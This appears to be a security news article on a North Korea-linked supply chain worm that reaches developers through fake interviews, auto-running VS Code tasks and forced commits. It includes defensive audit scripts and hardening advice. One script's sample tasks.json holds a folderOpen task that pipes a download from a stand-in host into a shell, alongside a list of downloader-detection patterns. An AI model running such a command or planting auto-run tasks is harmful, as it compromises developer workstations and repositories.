Void Dokkaebi Supply Chain Worm Targets Developers via Fake Interviews

The landscape of state-sponsored cyber warfare shifted significantly on April 21, 2026, as security researchers at Trend Micro unveiled a startling evolution in the tactics of Void Dokkaebi (also known as Famous Chollima or UNC2970). What began years ago as a series of targeted social engineering campaigns aimed at cryptocurrency developers has metamorphosed into a sophisticated Void Dokkaebi supply chain worm. This new threat doesn’t just steal credentials; it weaponizes the victim’s own development environment, turning infected machines into automated vectors for a global supply chain infection.
For years, North Korea-aligned threat actors have utilized “Job Interview” lures to gain initial access to high-value targets in the AI and Web3 sectors. However, the discovery of a self-propagating worm marks a paradigm shift. According to the latest intelligence, the group has moved beyond manual intrusion. They are now deploying a recursive malware framework that identifies, compromises, and exploits the very codebases that developers work on daily, ensuring that the Void Dokkaebi supply chain worm spreads through trusted channels like GitHub, GitLab, and private enterprise repositories.
The Anatomy of a Technical Recruitment Trap
The infection chain typically begins with a highly polished social engineering lure. Under the guise of recruiters from prominent AI or cryptocurrency firms—often using front companies like BlockNovas or SoftGlide—the attackers approach developers on platforms such as LinkedIn and Upwork. These interactions are increasingly sophisticated, often involving AI-powered deepfakes during video interviews. Attackers use real-time facial filters to impersonate legitimate personas, masking their true identities while conducting technical assessments.
The “trap” is sprung during the technical portion of the interview. The candidate is asked to clone a “test project” from a repository to perform a coding task or fix a bug. Hidden within these repositories is the initial payload. In previous iterations, this was a simple infostealer known as BeaverTail. In the 2026 campaign, however, the cloned repository contains the logic for the Void Dokkaebi supply chain worm, designed to achieve persistent, automated lateral movement through the developer’s local machine and their associated remote codebases.
Weaponizing the IDE: VS Code Task Exploitation
The core of this infection resides in the abuse of the Visual Studio Code (VS Code) ecosystem. Attackers have identified that developers often grant “Workspace Trust” to the projects they are actively working on. By injecting malicious configurations into the .vscode/tasks.json file, the Void Dokkaebi supply chain worm ensures its code executes automatically whenever a developer performs common actions, such as building the project or running a test suite.
Trend Micro’s research identified over 500 malicious VS Code task configurations as of early 2026. These tasks are typically configured as downloaders or launchers. Once the IDE environment is compromised, the malware executes a series of scripts—often obfuscated JavaScript or Python—that download secondary RATs (Remote Access Trojans) such as InvisibleFerret or GolangGhost. These tools provide the attackers with full remote control, credential harvesting capabilities, and the ability to exfiltrate sensitive cryptocurrency wallet data.
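Added example (not code from Trend Micro or the article): a small Python audit that reads a `.vscode/tasks.json`, flags tasks set to run automatically on `folderOpen`, and flags commands that fetch or decode code the way a downloader or launcher task would. The sample file and the pattern list are constructed for illustration; `scan_tree` walks a checkout directory to apply the same check to every project on a workstation.

```python
import json
import os
import re
# Constructed sample .vscode/tasks.json in the shape the article describes:
# one ordinary build task plus one task wired to run when the folder opens.
SAMPLE_TASKS_JSON = """{
  // tasks.json is JSON-with-comments, so full-line comments are stripped first
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -fsSL https://stage.example.invalid/s | sh",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

DOWNLOADER_PATTERNS = [  # fragments a build task rarely needs (assumed list, extend as needed)
    r"\bcurl\b", r"\bwget\b", r"Invoke-WebRequest", r"\biwr\b", r"\bIEX\b",
    r"-EncodedCommand", r"\s-enc\b", r"base64\s+(-d|--decode)\b",
    r"\bnode\s+-e\b", r"\bpython3?\s+-c\b", r"\|\s*(ba)?sh\b",
]

def strip_jsonc(text: str) -> str:
    """Drop full-line // comments and trailing commas so json.loads accepts tasks.json."""
    no_comments = re.sub(r"(?m)^\s*//.*$", "", text)
    return re.sub(r",(\s*[}\]])", r"\1", no_comments)

def audit_tasks(text: str) -> list:
    """Return (label, reason) pairs for tasks that auto-run or look like downloaders."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        label = task.get("label", "<unnamed>")
        cmd = " ".join(map(str, [task.get("command", "")] + list(task.get("args", []))))
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append((label, "auto-runs on folderOpen"))
        for pattern in DOWNLOADER_PATTERNS:
            if re.search(pattern, cmd):
                findings.append((label, f"downloader/launcher pattern {pattern!r}"))
                break
    return findings

def scan_tree(root: str) -> dict:
    """Audit every .vscode/tasks.json below root, e.g. a developer's checkout directory."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                results[path] = audit_tasks(fh.read())
    return results
```

VS Code's own `task.allowAutomaticTasks` setting, when set to `"off"`, stops `folderOpen` tasks from running without an explicit prompt, which is the IDE-side control this audit complements.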
How the Void Dokkaebi Supply Chain Worm Propagates
What differentiates this campaign from a standard backdoor is its “worm-like” behavior. Once the Void Dokkaebi supply chain worm gains a foothold on a developer’s machine, it scans the local filesystem for other Git repositories. The malware then actively weaponizes these local projects. This is achieved through two primary mechanisms:
- Malicious Task Injection: The worm automatically injects its malicious .vscode/tasks.json configuration into every folder that appears to be a development project. This ensures that any colleague or open-source contributor who clones these projects in the future will also be targeted.
- Commit Tampering and Automated Pushing: The most dangerous component discovered is a tool identified as temp_auto_push.bat. This utility is designed to tamper with the victim’s Git history. It injects malicious code into legitimate source files and then uses the developer’s own local credentials (SSH keys or personal access tokens) to “force-push” these changes to the upstream repository.
By leveraging the victim’s identity, the Void Dokkaebi supply chain worm bypasses standard security reviews. A commit coming from a trusted senior engineer is far less likely to be scrutinized than an external PR. Researchers identified that repositories belonging to major organizations, including DataStax and the Neutralinojs project, were temporarily compromised by these automated bursts of malicious commits. In the case of Neutralinojs, which boasts over 8,400 stars, the attackers utilized automated scripts to push malicious code to all four of the project’s main repositories in a single burst on March 2, 2026.
Blockchain Infrastructure: A Resilient Command-and-Control
The Void Dokkaebi supply chain worm has also evolved its infrastructure to be virtually immune to traditional domain takedowns. Instead of relying solely on hardcoded IP addresses or domain names that can be seized by the FBI (as was the case with the BlockNovas domain in 2025), the group has moved its payload staging to decentralized blockchain infrastructure.
The campaign utilizes the Tron, Aptos, and Binance Smart Chain (BSC) networks to stage its malicious payloads. By embedding encrypted download URLs or configuration data within blockchain transactions or smart contract metadata, the attackers create a highly resilient Command-and-Control (C2) channel. Because these blockchains are decentralized and immutable, defenders cannot “shut down” the source of the malware without the cooperation of the entire network—a feat that is technically and politically impossible.
Furthermore, the group continues to utilize a backbone of Russian IP address ranges, specifically centered in the cities of Khasan and Khabarovsk. These ranges are often cloaked by extensive anonymization networks, including commercial VPNs and RDP (Remote Desktop Protocol) sessions. By routing their traffic through regions with established ties to North Korea, the Void Dokkaebi operators maintain a layer of plausible deniability while benefiting from infrastructure that is outside the reach of Western law enforcement.
Scale of the Infection: By the Numbers
The scale of the Void Dokkaebi supply chain worm campaign is unprecedented for a North Korea-aligned APT. The March 2026 analysis revealed staggering metrics:
- 750+ Infected Repositories: Ranging from small personal projects to significant enterprise codebases.
- 500+ Malicious VS Code Tasks: Specifically engineered to execute downloaders the moment a workspace is opened.
- 100+ Instances of the Commit Tampering Tool: Found actively monitoring developer systems to hijack Git workflows.
- 80+ Browser Extensions Targeted: Including cryptocurrency wallets (MetaMask, Phantom, TronLink) and password managers (1Password, NordPass).
The Strategic Objective: Finance and Espionage
While the Void Dokkaebi supply chain worm is a technical marvel, its purpose is fundamentally geopolitical. As a subgroup of the Lazarus Group (also tracked as APT38 or BlueNoroff), Void Dokkaebi serves as a primary revenue generator for the North Korean regime. The theft of cryptocurrency serves to bypass international sanctions and fund the nation’s weapons programs.
However, the shift toward a supply chain worm suggests a dual motivation. By infiltrating organizational codebases, the group gains access to intellectual property, signing keys, and CI/CD pipelines. This provides a platform for long-term espionage and the potential for large-scale destructive attacks. A single developer at a major fintech firm, if compromised by this worm, could inadvertently introduce a backdoor into a product used by millions of customers globally.
Defending Against the Developer-Centric Worm
Traditional endpoint protection is often insufficient against the Void Dokkaebi supply chain worm because it operates within the context of trusted development tools. To mitigate this threat, organizations must adopt a more granular approach to developer security:
- IDE Hardening: Disable automatic task execution in VS Code and other IDEs. Implement policies that require manual approval for all workspace tasks, even in “trusted” projects.
- Commit Integrity: Enforce Signed Commits using GPG or SSH keys. If a developer’s machine is compromised, the worm may be able to push code, but it will lack the secret key required to sign the commit, making the anomaly immediately visible in the Git history.
- Branch Protection: Implement strict branch protection rules that require multi-person review for all merges. Automated pushes should be restricted to specific service accounts with limited scopes.
- Credential Hygiene: Use hardware security modules (HSMs) or hardware tokens for Git authentication and cryptocurrency wallet access. If credentials are stored in local configuration files or the system keychain, they are trivial targets for BeaverTail or InvisibleFerret.
- Network Egress Monitoring: Monitor for connections to known blockchain APIs (Tron, Aptos) from development machines that do not have a legitimate business reason to interact with those networks.
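Added example (not from Trend Micro or the article): a Python audit over `git log --format='%H%x1f%G?%x1f%an%x1f%s' --name-only` output that surfaces the two anomalies the Commit Integrity and Branch Protection items rely on, commits whose signature is missing or cannot be verified, and commits that touch IDE task or CI workflow files. The sample log text and the sensitive-path list are constructed; `git_log_output` is the helper that would fetch real output from a checkout.

```python
import subprocess

# git's %G? signature states; None means "signed and verified, nothing to flag".
SIG_STATUS = {"G": None, "U": None, "N": "no signature", "B": "bad signature",
              "E": "signature could not be checked (signer's key missing)",
              "X": "good signature that has expired", "Y": "good signature from an expired key",
              "R": "good signature from a revoked key"}
# Paths worth a second look given the task-injection mechanism described above (assumed list).
SENSITIVE_PREFIXES = (".vscode/tasks.json", ".vscode/launch.json", ".github/workflows/")
LOG_FORMAT = "%H%x1f%G?%x1f%an%x1f%s"      # sha, signature state, author, subject

# Constructed log output: header line, blank line, then one changed path per line.
# The parser keys on the \x1f separator, so blank-line spacing does not matter.
SAMPLE_LOG = "\n".join([
    "a1b2c3\x1fG\x1falice\x1fAdd retry to client", "", "src/client.py",
    "d4e5f6\x1fN\x1falice\x1fchore: update tooling", "", ".vscode/tasks.json", "src/client.py",
    "0f9e8d\x1fE\x1fbob\x1fFix typo", "", "README.md",
])

def git_log_output(repo: str, rev_range: str = "origin/main..HEAD") -> str:
    """Raw log text for a range; %G? only verifies when the signers' keys are available locally."""
    cmd = ["git", "-C", repo, "log", f"--format={LOG_FORMAT}", "--name-only", rev_range]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout

def audit_log(text: str) -> list:
    """Return (sha, author, reasons) for commits that are unsigned/unverifiable or touch sensitive paths."""
    commits = []
    for line in text.splitlines():
        if "\x1f" in line:                  # header line opens a new commit record
            sha, status, author, _subject = line.split("\x1f", 3)
            commits.append({"sha": sha, "status": status, "author": author, "files": []})
        elif line.strip() and commits:      # every other non-empty line is a changed path
            commits[-1]["files"].append(line.strip())
    findings = []
    for c in commits:
        reasons = []
        sig = SIG_STATUS.get(c["status"], f"unknown signature state {c['status']!r}")
        if sig:
            reasons.append(sig)
        reasons += [f"touches {f}" for f in c["files"] if f.startswith(SENSITIVE_PREFIXES)]
        if reasons:
            findings.append((c["sha"], c["author"], reasons))
    return findings
```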
The Future of Supply Chain Threats
The emergence of the Void Dokkaebi supply chain worm signifies that the era of “targeted phishing” is evolving into the era of “automated ecosystem compromise.” By targeting the people who build the world’s software, Famous Chollima has found a way to scale its operations exponentially. The worm does the work that used to require dozens of human operators, turning every infected developer into an unwilling recruitment agent for the next victim.
As we move deeper into 2026, the integration of AI-driven social engineering and self-propagating malware will only accelerate. The security of the global software supply chain no longer depends solely on the strength of the server-side code; it depends on the security of the individual developer’s workstation. Void Dokkaebi has proven that in the modern threat landscape, a single “fake interview” can be the patient zero for a global epidemic.
Written by
TempMail Ninja